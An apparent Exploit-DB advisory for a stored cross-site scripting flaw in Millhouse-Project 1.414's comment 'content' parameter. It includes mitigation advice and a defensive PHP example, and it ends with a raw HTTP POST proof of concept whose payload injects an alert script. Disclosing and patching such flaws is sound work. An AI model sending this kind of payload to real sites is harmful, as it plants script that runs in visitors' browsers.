Vendor: Millhouse-Project
By: Cakes
CVSS: 8.8 (HIGH)
Type: Persistent Cross-Site Scripting
CWE: 79
Product Name: Millhouse-Project
Affected Version From: 1.414
Affected Version To: 1.414
Patch Exists: NO
Related CWE: N/A
CPE: a:thrsrossi:millhouse-project:1.414
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CentOS 7
2019

thrsrossi Millhouse-Project 1.414 – ‘content’ Persistent Cross-Site Scripting

A Persistent Cross-Site Scripting (XSS) vulnerability exists in thrsrossi Millhouse-Project 1.414. An attacker can send a malicious payload to the 'content' parameter of the add_comment_sql.php script, which is then stored in the database and executed when the page is loaded. This can allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser.

Mitigation:

Input validation should be used to prevent malicious payloads from being stored in the database. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent the execution of malicious JavaScript code.
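
An added example of the mitigation above, not code from Millhouse-Project or from the exploit author: a comment is validated before storage, HTML-encoded when rendered, and the page is served with a nonce-based CSP. The function names, the 2000-character limit and the availability of the mbstring extension are assumptions.

```php
<?php
declare(strict_types=1);
// Added example: all function names are hypothetical, not Millhouse-Project code.

/** Validate a submitted comment before storing it; returns null when rejected. */
function validate_comment(string $raw, int $maxLen = 2000): ?string
{
    if (!mb_check_encoding($raw, 'UTF-8')) {
        return null; // malformed byte sequences are never stored
    }
    // Remove control characters other than tab, LF and CR, then trim.
    $clean = trim(preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/u', '', $raw) ?? '');
    if ($clean === '' || mb_strlen($clean, 'UTF-8') > $maxLen) {
        return null;
    }
    return $clean; // stored as text; markup is neutralised at output time
}

/** Encode a stored comment for an HTML element context. */
function render_comment(string $stored): string
{
    $escaped = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<p class="comment">' . nl2br($escaped, false) . '</p>';
}

/** Build a CSP value that allows only same-origin and nonce-tagged scripts. */
function build_csp(string $nonce): string
{
    return "default-src 'self'; script-src 'self' 'nonce-{$nonce}'; "
         . "object-src 'none'; base-uri 'none'";
}

// Constructed input: the 'content' value from the request on this page.
$submitted = urldecode('%3Cscript%3Ealert%28%22TEST%22%29%3B%3C%2Fscript%3E');
$stored    = validate_comment($submitted);

$nonce = base64_encode(random_bytes(16));
if (PHP_SAPI !== 'cli' && !headers_sent()) {
    header('Content-Security-Policy: ' . build_csp($nonce));
}
if ($stored !== null) {
    echo render_comment($stored), PHP_EOL; // markup characters arrive as entities
}
```

The sample value passes validation because it is well-formed text, so the encoding in `render_comment` is what keeps it from being parsed as markup, and the CSP blocks inline scripts that lack the nonce if an unencoded sink is missed.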

Exploit-DB raw data:

# Exploit Title: thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
# Software Link: https://github.com/thrsrossi/Millhouse-Project.git
# Version: 1.414
# Tested on: CentOS 7
# CVE: N/A

# PoC for this XSS attack

POST /includes/add_comment_sql.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/views/single_post.php?post_id=53
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: PHPSESSID=0sqr9kui308rq66ol1uu5olb94; submenu1=block; showips=10; showurls=10; showreferers=10
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

content=%3Cscript%3Ealert%28%22TEST%22%29%3B%3C%2Fscript%3E